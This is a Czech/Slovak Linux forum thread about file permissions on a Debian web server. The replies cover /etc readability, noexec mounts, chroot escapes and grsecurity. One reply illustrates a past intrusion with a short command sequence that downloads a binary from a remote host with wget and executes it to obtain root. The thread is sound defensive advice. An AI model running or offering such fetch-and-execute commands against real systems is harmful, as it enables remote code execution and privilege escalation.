chmod cely disk

Zdravim, mam webovy server na debianu, zatim pouze pristupny me, ale i tak by me zajimalo jake opravneni doporucujete na cely disk, popripade jednotlive adresare, vsiml jsem si ze vetsina disku(i /etc/) je pristupna ostatnim uzivatelum pro cteni, jen nektere bezpecnostni soubory jsou odepreny.... moc se mi to nezamlouva, myslite ze je rozumne dat vse pro other user 0 .... nespadne system napriklad kdyz dam /etc 770 ? Uvitam rady z praxe:)

dekuji

Odpovědi

V adresáři /etc máte globální konfigurační soubory většiny programů, takže systém sice asi nespadne, ale spousta aplikací nebude fungovat. Navíc nebude fungovat i ledacos dalšího, protože některé systémové konfigurační soubory (třeba /etc/passwd) potřebují číst i docela běžné programy. Takže: nevylijte s vaničkou i dítě.

3.9.2006 19:13 smrtak
Rozbalit Rozbalit vše Re: chmod cely disk

Co vlastne muze vsechno natropit takovy prihlaseny uzivatel pres ssh (shellu), se standartnim opravnenim? (napriklad uzivatel z FTP serveru), za predpokladu ze mnou pridane dulezite data jsou bez other user read...

3.9.2006 20:52 Michal Kubeček | skóre: 71 | Luštěnice
Rozbalit Rozbalit vše Re: chmod cely disk

To záleží na vás, co mu dovolíte. Navíc je tu samozřejmě riziko, že kromě té chyby, jejíž vinou se vám tam dostal, tam bude ještě nějaká lokálně zneužitelná, která mu umožní získat roota.

Ak poskytuješ shell nedôveryhodným užívateľom, tak by si mal v prvom rade zabezpečiť, aby všetky partície kde môžu zapisovať boli mountované s voľbou noexec. Typicky to budú adresáre /tmp/ /var/tmp/ /home/uzivatel/ /var/www/uzivatel a tak podobne. Mám z vlastnej skúsenosti, že hacknutie je niekedy otázkou pár príkazov, napr:

cd /var/tmp
uname -a
ls -la
wget xyz.ro/x
chmod +x  x
./x

Toľkoto málo típkovi stačilo na to aby sa dostal k rootovským oprávneniam a začal mi na servri robiť neplechu.

4.9.2006 14:02 tren
Rozbalit Rozbalit vše Re: chmod cely disk

noexec na particii se da obejit.

4.9.2006 18:29 AraxoN | skóre: 47 | blog: slon_v_porcelane | Košice
Rozbalit Rozbalit vše Re: chmod cely disk

Za každých podmienok? To ma zaujíma... Nejaký príklad, alebo vodítko? Jediné čo som našiel ja bolo ku starému kernelu, alebo ku starému glibc.

a co takhle chroot ?

Není důležité co se stane, ale jak se to vysvětlí.

3.9.2006 22:56 Messa | skóre: 39 | blog: Messa
Rozbalit Rozbalit vše Re: chmod cely disk

Některé hostingy nabízející SCP používají pro zabezpečení scponly shellu chroot. Pokud bude nabízet plnohodnotný shell, pak platí i výše zmíněná opatření, protože z chrootu se dá dost snadno dostat ven.

4.9.2006 05:06 Zdeněk Burda | skóre: 61 | blog: Zdendův blog | Praha
Rozbalit Rozbalit vše Re: chmod cely disk

Pokud použiješ například grsec, tak se z toho chrootu zas tak snadno nedostaneš...

-- Nezdar není hanbou, hanbou je strach z pokusu.

Tak ted z toho nejsem vubec moudry :) ... v prvni rade se tedy pokusim zamezit vsem ostatnim uzivatelum(ftp,...) pristupu do shellu, pak me taky napada ze php bez safe modu zrovna taky bezpecne neni, i kdyz ho vyuzivam jenom ja, je tu porad moznost ze nejaky opensource bude obsahovat zavazny bug (viz phpbb kdy sel uploadovat php soubor na server a bez safemodu by sel tedy spoustet bash?)

Dotaz: chmod cely disk

Odpovědi